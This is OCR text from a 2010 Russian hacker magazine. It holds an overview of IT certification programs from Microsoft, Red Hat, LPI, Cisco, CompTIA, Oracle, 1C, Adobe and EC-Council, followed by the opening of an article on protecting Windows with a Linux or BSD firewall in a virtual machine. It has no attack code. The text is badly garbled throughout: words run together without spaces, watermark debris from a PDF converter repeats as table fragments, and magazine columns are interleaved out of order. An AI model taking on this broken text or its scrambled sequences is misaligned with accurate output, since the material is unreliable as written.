«Мелкомягкие» вездеивсюду, такчтосними нужносчитаться. Ихсертификаты, вовсяком случае, базовые, сравнительнонедороги(пара сотендолларов) икотируютсянарынкетруда, являясьдовольновесомойбумагой.
СистемасертификациивMS делитсянаследующиеуровни:
• специалистыпотехнологии: программы сертификации, подтверждающиенавыкиИТ профессионаловвовнедрении, построении, устранениинеполадок, иотладкиконкретной технологииMicrosoft;
•профессионалы: программысертификации, подтверждающиеналичиеспецифичныхдля определеннойдолжностинавыков, выходящих зарамкизнаниятехнологии;
•мастера: сертификацияуровня«Мастер» подтверждаетналичиеуспециалистаглубоких техническихзнанийконкретногопродукта
Microsoft;
•архитекторы: программаСертифицированныйАрхитекторпомогаеткомпаниямвыявить опытныхИТархитекторов, прошедшихстрогую процедуруотбора, проводимуюнаблюдательнымсоветом.
Существуюттакжеотдельныесертификатыдля преподавателей.
Каждаяветкасертификациипозволяетвыбратьопределеннуюспециализацию, отаса почастиOffice 2007 домастераMicrosoft SQL Server 2008 итакдалее.
Сполнымописаниемпрограммсертификации, спискамисамихсертификатовидругойполезнойинфойможноознакомитьсяпоадресуwww. microsoft.com/Rus/Learning/MCP/Default.mspx
RED HAT
Линуксоидыпочастисертификатовтожене обижены, иRed Hat, пожалуй, являетсялидеромвэтойобласти. Программасертификации от«Красныхшапок» доступнавболеечем40 странахмира, включаяРоссию. Этиребятас радостьюпроверяттвоискиллывобластиRed Hat Enterprise Linux, Red Hat Linux иFedora Core, апотомвыдадутсоответствующуюбумагу. ВRed Hat можностатьобладателемследующих «титулов»:
•Red Hat Certified Technician (RHCT);
•Red Hat Certified Engineer (RHCE);
•Red Hat Certificates of Expertise;
•Red Hat Certified Security Specialist (RHCSS);
•Red Hat Certified Datacenter Specialist (RHCDS);
•Red Hat Certified Architect (RHCA).
Замечу, чтосертификатыRed Hat хороши всем, кромецены— зачастуюсчетздесь идетнаприснопамятныетысячидолларов, этосвоегородарасплатазапрестижность бумажкииименитостьRed Hat. Впрочем, высокимирасценками, конечно, грешатне только«Красныешапки».
Заподробностямиотносительнопрограмм сертификацииотRed Hat сюда: www.europe. redhat.com/training
НАГЛЯДНАЯ ИНФОГРАФИКА ОТ «МЕЛГОМЯГКИХ». СТРУКТУРА
ПРОГРАММ СЕРТИФИКАЦИИ MICROSOFT.
LINUX PROFESSIONAL INSTITUTE (LPI)
Ещеодноудобстводлялинуксоидов— некоммерческаямеждународнаяобщественная организацияLinux Professional Institute (LPI).
Этиребятасертифицируютсистемныхадми-
нистраторовGNU/Linux иGNU/Linux-програм-
мистов, безпривязкиккакому-либоконкрет- номудистрибу, чтобезсомненияявляется большимплюсом.
Градацияпрограммывыглядитследующим образом. Двауровнябазовыхкурсов:
LPIC Level 1
Дляполучениянужносдатьэкзамены:
•101: General Linux I;
•102: General Linux II. LPIC Level 2
Дляполучениянужносдатьэкзамены:
•201: Advanced Administration;
•202: Linux Optimization.
Итретий, продвинутыйуровень:
LPIC Level 3
Дляполучениянужносдатьэкзамены:
•321: Windows Integration;
•322: Internet Server;
•323: Database Server;
•324: Security, Firewalls, Encryption;
•325: Kernel Internals & Device drivers; Creating distribution packages;
•32x: Дополнительныеэкзаменыповыбору. Вседеталиописанынаофициальномсайте организации: www.lpi.org.
CISCO
ГодзагодомCisco Systems поставляетна мировойрынокпочти80% маршрутизаторов, чтоделаетиходнимизкрупнейшихигроков нарынкесетевогооборудования. Такжеза Cisco ужедавнозакрепилосьзваниеодногоиз
074 |
XÀÊÅÐ 05 /136/ 10 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
КУСОЧЕК ЛАБОРАТОРИИ КОМПАНИИ CISCO.
лидероввобластисетевыхтехнологий, аих программасертификацииобширнаипроверенавременем. Какнетруднодогадаться, в Cisco выдают«грамоты» сетевымспециалистамвсехмастей.
КаквMicrosoft ирядедругихкомпаний, здесь существуетнесколькоуровнейсертификации: Entry, Associate, Professional, Expert, атакже отдельнаясертификацияSpecialist. Наиболее престижнымидорогимсрединихявляется сертификатCCIE (Expert).
Далееидетделениепосеминаправлениям: Routing & Switching, Design, Network Security, Service Provider, Storage Networking, Voice, и Wireless.
СертификацииотCisco отличаетредкаястепеньзубодробильности, такчтобезсерьезной подготовки(тоесть, скореевсего— курсов)
пройтиихврядлиполучится. Витоге, драгоценнаябумагаможетобойтисьтебевпару тысячвечнозеленыхденег.
Вдальнейшиехитросплетенияинюансы можновникнутьздесь: www.cisco.com/web/go/ certifications
COMPTIA (Computing Technology Industry Association)
Приятнымисключениемизнашегонебольшого спискаявляютсяпрограммысертификации отCompTIA. Деловтом, чтовотличиеотполка вендоров, этонезависимыеребятас28-летней историейимировымименем.
СертифицируетCompTIA последующим направлениям:
•CompTIA A+ (сертификатобщегохарактера, дляначинающихIT-спецов);
•CompTIA Network+;
•CompTIA Security+;
•CompTIA Server+;
•CompTIA Linux+;
•CompTIA PDI+;
•CompTIA RFID+;
•CompTIA Convergence+;
•CompTIA CTT+;
•CompTIA CDIA+;
•CompTIA Project+.
Интересноито, чтоздесьпозаботилисьне толькоохардкорныхгиках— вактивекомпании такжеимеютсясертификатIT Fundamentals, подтверждающийбазовыезнаниякомпью-
терныхпремудростей, сертификатдлялюдей, работающихвобластиIT продаж— IT for Sales, идажесертификатGreen IT, которыйжизненно необходимкаждомугринписовцу.
Официальныйсайт: www.comptia.org
ORACLE
СовсемнедавноOracle приобрелкомпанию Sun Microsystems, такчтоздесьтеперьпредоставляютцелыйворохсертификатов— ксобственнымпрограммамOracle добавились, как минимум, сертификатыдляJava специалистов. Сертификацияже«Оракла» делитсяна следующиеуровни: Certified Associate, Certified Professional, Certified Master, Special Accreditation, Certified Expert Program и Certified Specialist.
Перечислятьвсе«звания», которыеможно получить, атакжеобласти, вкоторыхвыдаются сертификаты, небудем— слишкомобъемно, вместоэтоголучшедержинеудобнуюссылку наофициальныеданные: www.education. oracle.com/pls/web_prod-plq-dad/db_pages. getpage?page_id=39
1C
Отечественный1Спопалвэтотсписоквовсене поошибке. Всеже, мыживемвРоссииидалеко некаждыйIT-шникнепременностремитсянай- тиработузарубежом. Аунас, какэтонистранно, 1Сиспользуетсяповсеместно, испецывэтой области, вполнепредсказуемо, востребованы. Нуи, разнообразияради, этомуспискунепомешаетхотябыодинроссийскийвендор:). Сертификат«1С:Профессионал» будетявлятьсяофициальнымподтверждениемтого, что еговладелецможетэффективноиспользовать всвоейработевесьспектрвозможностей «1С:Бухгалтерия».
Сертификациянаданныймоментпроводитсяпосистемам«1С:Предприятие8» и «1С:Предприятие7.7».
Официальнаяинформация: www.1c.ru/prof/ prof.htm
ОФИЦИАЛЬНЫЙ САЙТ EC-COUNCIL. ЭТИЧНЫЕ ХАКЕРЫ СУРОВЫ, ДАЖЕ ЕСЛИ ОНИ ДЕВУШКИ.
ADOBE
Вышеяужеупомянуладизайнеров, такчтоэтот пункткакраздлянихиихколлег, еслионинас читают.
Adobe Systems Incorporated, самособой, не моглаостатьсявстороне, когдадругиекрупные производителиПОодинзадругимоткрывали программысертификации.
ВAdobe можнополучитьтрисертификата: Adobe Certified Expert (ACE), Adobe Certified Associate (ACA) иAdobe Certified Instructor (ACI).
ACE — это эксперт в области какого-то одного или нескольких продуктов Adobe, ACA — оценивает способности кандидатов в создании, управлении и интеграции обычных и мультимедиа данных при использовании приложений Adobe, ну а ACI, понятное дело, сертификат для инструкторов и учителей.
Официальныйсайт: www.adobe.com/support/ certification
À ÊÀÊ?
Теперь, когда ты имеешь общее представление о лучших программах сертификации, существующих на рынке, пришло время поговорить о том, как же стать гордым обладателем вышеописанных или других сертификатов.
Кактыпонимаешь, 99% вендоров, этокомпаниизападныеидержатьвРоссиифилиал, занимающийсясертификацией, подготовкой кнейитакдалее, им, зачастую, неинтересно, невыгодноилиненужно. Однакоотчаиватьсяипугатьсянестоит, унас, темнеменее, имеетсяцелыйрядмест, гдеможнопройти подготовкуисдатьсамиэкзамены— авто- ризованныекурсыисертификациювсе-таки никтонеотменял.
В вопросе поиска учебного центра или провайдера сертификационных услуг следует быть предельно осторожным и бдительным
— в последнее время в сети процветают десятки сомнительных ресурсов, которые с радостью попытаются всучить себе свой,
«неимоверно крутой» сертификат, с которым можно разве что сходить в туалет, или умело
XÀÊÅÐ 05 /136/ 10 |
075 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
СЦЕНА
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
СЕРТИФИКАТ СПЕЦА ПО EXCEL 2000 |
|
|
|
прикинуться официальными партнерами |
ПРЕДСТАВИТЕЛЬ COPMTIA ТЕРРИ ЭРДЛЕ РАССКАЗЫВАЕТ О НОВОЙ ПРОГРАММЕ |
||
известных компаний. |
СЕРТИФИКАЦИИ |
|
|
Всвоюочередьнаиболеепроверенными |
|
|
|
изарекомендовавшимисебяместамидля |
|
|
|
прохождениясертификациииповышения |
Всяподробнаяинформация, касающаяся |
Если говорить об английском, то для этих |
|
квалификацииунасявляются: |
подготовкиктестам(восновномсертифи- |
целей неплохо подойдут, к примеру, IELTS: |
|
• Центркомпьютерногообучения«Специ- |
кационныеэкзаменывыполненыименнов |
International English Language Testing |
|
алист» приМГТУим. Н.Э. Баумана: www. |
видетестов), ихсодержанияидругихважных |
System, или популярный в России TOEFL: |
|
specialist.ru; |
мелочей, какправило, доступнанасайтеса- |
Test of English as a Foreign Language. |
|
• МГУ, прикоторомимеется«Учебныйцентр |
моговендорасертификата. Частотамможно |
Поповодупервогоможнопочитатьздесь: |
|
ВМКМГУ& Softline Academy»: www.it- |
встретитьдажеспискирекомендованной |
www.ielts.org |
|
university.ru. |
литературы. |
Поповодувторогоздесь: www.toefl.org |
|
Нестоитзабыватьипровайдеровсертифи- |
Такжепомниотом, чтовинетеестьвсевозмож- |
Если позволяют возможности, ярким |
|
кациимировогоуровня, имеющихфилиалыв |
ныесимуляторыэкзаменов, благодарякоторым |
штрихом к резюме может послужить и ка- |
|
разныхстранах, включаяРоссию. Например, |
можнонеплохопотренироватьсяпередсдачей, |
кой-то необычный, но уважаемый на рынке |
|
Thomson Prometric: www.prometric.com иVUE: |
проверивсвежеприобретенныезнания. |
сертификат. В качестве примера хорошо |
|
www.vue.com. |
ДРУГИЕ ИНТЕРЕСНЫЕ |
подойдет сертификат общества Mensa — |
|
каждый отдельный сертификат, в каждой |
организации для людей с высоким коэф- |
||
Что касается подготовки к экзаменам, то |
СЕРТИФИКАТЫ |
крупнейшей и старейшей на нашей планете |
|
подхода, поэтому советы общего характе- |
некоммерческое и открытое, но членство в |
||
области требует очень индивидуального |
|
фициентом интеллекта. «Менса» общество |
|
ра здесь вряд ли будут уместны. Сказать |
Еслитыполагаешь, чтоуважающемусебя |
нем дает возможность ощутить себя самой |
|
точно можно лишь одно — придется |
IT’шникунужнылишьсертификатывобласти |
настоящей элитой — чтобы попасть туда, |
|
заниматься, готовиться, тратить на это |
IT, тынеправ. Кпримеру, вкачествеприятного |
нужно под пристальным наблюдением |
|
время, деньги, штудировать литературу, и |
бонусакрезюменеплохобудетполучитьтакже |
комиссии, сдать IQ тест лучше, чем 98% |
|
возможно, посещать курсы. Одним словом, |
языковойсертификат, подтверждающий, что |
населения Земли. Задачка, конечно, не |
|
«студенческие годы strike back», по пол- |
тынадостойномуровневладеешькаким-либо |
самая легкая, но более 100 тыс. человек с |
|
ной программе. |
иностраннымязыком. |
ней как-то справились :). |
|
КАПИТАН ОЧЕВИДНОСТЬ ПРОСИЛ ПЕРЕДАТЬ, ЧТО ЭТО ЛОГО COMPTIA |
Сайторганизации: www.mensa.org |
||
Ещеодназабавнаяинесовсемобычнаяна |
|||
|
|
|
первыйвзглядбумага— сертификатэтичного |
|
|
|
|
|
|
|
хакера(Certified Ethical Hacker), придуман- |
|
|
|
ныйInternational Council of E-Commerce |
|
|
|
Consultants (EC-Council). Этичныехакеры |
|
|
|
ребята, всущностисвоейдобрые— позаказу |
|
|
|
компанийонитестируютпродуктынауязви- |
|
|
|
мости, стараясьвзломатьихи, такимобразом, |
|
|
|
найтидыркиибаги. |
|
|
|
Подробнееузнатьотом, какофициальностать |
|
|
|
добрымхакеромможноздесь: www.eccouncil. |
|
|
|
org/certification/certified_ethical_hacker.aspx z |
|
|
|
|
076 |
|
XÀÊÅÐ 05 /136/ 10 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
Реклама
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|
|
|
||||
|
F |
|
|
|
|
|
|
t |
|
|
|
|
|||
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
||
|
|
|
|
|
|
|
|
|
r |
|
|
||||
P |
|
|
|
|
|
NOW! |
|
o |
|
|
|||||
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|
|
|
|
|
|||
w Click |
to |
|
|
|
|
|
|
|
|
UNIXOID |
|
||||
|
|
|
|
|
|
|
|
|
Сергей «grinder» Яремчук grinder@ua.fm |
||||||
|
|
|
|
|
|
|
|
m |
|
||||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
w |
|
|
|
|
|
|
|
|
o |
|
|
|
|
|
|
. |
|
|
|
|
|
.c |
|
|
|
|
||||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
|
|
|
|
df |
|
|
n |
e |
|
|
|
|
||||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
Виртуальный защитник
КакобеспечитьбезопасностьWindowsприпомощи *nix-системы,запущеннойввиртуальноймашине
Большинствоизнаспривыклокстандартнымрешениям, которыене пересматриваютсягодами. Такзащитувиндымыдоверяемодномуитому жекомплектупрограмм— файрвол, антивирус, антишпионскаяпрограмма… Подобныйнаборестьукаждого, отличаютсялишьпроизводители. Мыжепопробуемдругойпуть— использоватьвкачествеблокпоста*nixсистему, запущеннуюввиртуальноймашине. Анасколькоэтотподход окажетсяэффективнымвкаждомконкретномслучае, решатьужетебе.
СУТЬИДЕИ
Встроенныевиндовыесредства—Windows FirewallиInternetConnectionSharing(Общий доступкинтернету)достаточнонеудобны,малофункциональныинеобеспечиваютдолжного уровнязащиты.Поэтому,чтобыраздатьинтернет нанесколькокомпов,свозможностьюполноценногоконтролявсегопроцесса,требуетсялибохардварныйроутер,либоодноизсофтовыхрешений,
вродеUserGateProxy&Firewall,NetworkShield FirewallилиKerioWinRouteFirewall.Роутерпо-
нятенвнастройках,дажесамыепростыежелезки имеютминимальные функциифильтрапакетов, маршрутизации,защитыотатакитакдалее.Но частоеговозможностинедаютразвернутьсяна полную,ирукисвязанытем,чтозаложеновнего производителем.Болеефункциональныерешениястоятсоответственно,ноиихвозможностей
можетнехватать(например,шейпинга,учета трафика,мониторингазагрузкиканала).Аналогичнаяситуацияиссофтовымирешениями.За хорошийфайрволсовсеминаворотамипридется заплатить.Нестоитзабыватьотом,чтозащита работает,покапользовательостаетсявдомашней локальнойсети,ностоитподключитьсякинету черезоднуизмногочисленныхточекдоступаза пределамидома,какмыоставляемкомпьютерс WindowsFirewall,тоестьпрактическибеззащитным.
Мощностисовременныхнастольныхсистем вполнедостаточно, чтобыустановитьвиртуальнуюмашину, которуюииспользоватьв качествефайрадлязащитылокальнойсистемы илишлюзадляподключениядругихкомпьютеровдомашнейсети. Крометого, нанем можноразвернутьпрокси, кэширующийDNS
ипрочиенеобходимыесервисы(например, IDS, VPN илиIP-PBX). Естественно, вцелях экономииресурсовввиртуальноймашинене стоитзапускатьдесктопнуюОС, вполнеможно обойтисьсервернымдистрибутивомLinux в минимальнойинсталляции, иливзятьоднуиз BSD систем. Например, OpenBSD вдефолтовой установкепрекрасноработает, еслиейвыделить всего32-64 МбОЗУи300 Мбместанахарде, что, согласись, совсемнемного, особенноучитывая возможностиэтойоперационки.
ВдальнейшеммырассмотримнастройкиPF в OpenBSD иiptables вLinux. Вкачествевиртуаль-
ноймашиныбудемиспользоватьбесплатный VirtualBox (virtualbox.org), которыйдостаточно проствнастройкахинежадендооперативки. ХотяприжеланииегоможнозаменитьQEMU, Virtual PC илидругимрешением. Ещевариант:
078 |
XÀÊÅÐ 05 /136/ 10 |